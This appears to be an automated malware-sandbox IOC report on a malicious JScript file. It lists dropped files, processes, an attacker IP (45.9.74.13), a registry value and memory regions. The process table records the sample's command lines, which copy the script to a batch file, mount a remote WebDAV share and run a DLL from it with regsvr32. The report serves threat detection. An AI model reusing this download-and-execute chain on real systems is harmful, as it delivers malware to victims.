IOC Report
911966882735824909.js

loading gif

Files

File Path
Type
Category
Malicious
911966882735824909.js
ASCII text, with very long lines (3738), with CRLF line terminators
initial sample
malicious
C:\Users\user\qtgsne.bat
ASCII text, with very long lines (3738), with CRLF line terminators
dropped
C:\Users\user\qtgsne.bat:Zone.Identifier
ASCII text, with CRLF line terminators
modified

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\911966882735824909.js"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\911966882735824909.js" "C:\Users\user\\qtgsne.bat" && "C:\Users\user\\qtgsne.bat"
malicious
C:\Windows\System32\net.exe
net use \\45.9.74.13@8888\DavWWWRoot\
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\regsvr32.exe
regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\539.dll

URLs

Name
IP
Malicious
http://45.9.74.13:8888/~
unknown
http://45.9.74.13:8888/
unknown

IPs

IP
Domain
Country
Malicious
45.9.74.13
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
23C472DC000
heap
page read and write
23C470D0000
heap
page read and write
1410000
heap
page read and write
2A73BDA7000
heap
page read and write
2A73C030000
heap
page read and write
BCDC6FE000
stack
page read and write
BCDC4FF000
stack
page read and write
E62CF0A000
stack
page read and write
23C47120000
heap
page read and write
2A73BCF0000
heap
page read and write
2AAF000
stack
page read and write
23C4719D000
heap
page read and write
1414000
heap
page read and write
23C4718A000
heap
page read and write
23C47184000
heap
page read and write
2A73BDF5000
heap
page read and write
BCDC57E000
stack
page read and write
D6B000
stack
page read and write
23C47177000
heap
page read and write
2A73BD20000
heap
page read and write
2A73BDE1000
heap
page read and write
23C470B0000
heap
page read and write
2A73BD50000
heap
page read and write
2A73BD8E000
heap
page read and write
BCDC77F000
stack
page read and write
E62D3FE000
stack
page read and write
23C48F60000
heap
page read and write
23C472D5000
heap
page read and write
DB0000
heap
page read and write
E62D8FE000
stack
page read and write
23C47185000
heap
page read and write
23C472D0000
heap
page read and write
23C4716E000
heap
page read and write
23C472DB000
heap
page read and write
1170000
heap
page read and write
23C4719D000
heap
page read and write
2A73BD59000
heap
page read and write
2A73BF40000
remote allocation
page read and write
2A73BDEB000
heap
page read and write
E62DBFB000
stack
page read and write
23C4719D000
heap
page read and write
23C48C00000
heap
page read and write
2A73BD85000
heap
page read and write
2A73BD85000
heap
page read and write
23C47188000
heap
page read and write
2A73BD8B000
heap
page read and write
DC0000
heap
page read and write
2A73BD7A000
heap
page read and write
23C47148000
heap
page read and write
2A73C034000
heap
page read and write
2A73BF40000
remote allocation
page read and write
BCDC67C000
stack
page read and write
2A73BD00000
heap
page read and write
23C46FD0000
heap
page read and write
23C47163000
heap
page read and write
2A73BDB9000
heap
page read and write
23C472DA000
heap
page read and write
E62D9FD000
stack
page read and write
23C47177000
heap
page read and write
2A73BDD0000
heap
page read and write
23C48F50000
heap
page read and write
23C47161000
heap
page read and write
1194000
heap
page read and write
23C48F60000
heap
page read and write
E62D2FE000
stack
page read and write
23C48F51000
heap
page read and write
23C48F5A000
heap
page read and write
BCDC476000
stack
page read and write
23C47149000
heap
page read and write
2A73BF40000
remote allocation
page read and write
E62D5FF000
stack
page read and write
1187000
heap
page read and write
10D0000
heap
page read and write
2BD0000
heap
page read and write
E62D6FF000
stack
page read and write
117C000
heap
page read and write
23C48F5A000
heap
page read and write
E62D7FE000
stack
page read and write
BCDC5FE000
stack
page read and write
23C472DC000
heap
page read and write
23C4719D000
heap
page read and write
There are 71 hidden memdumps, click here to show them.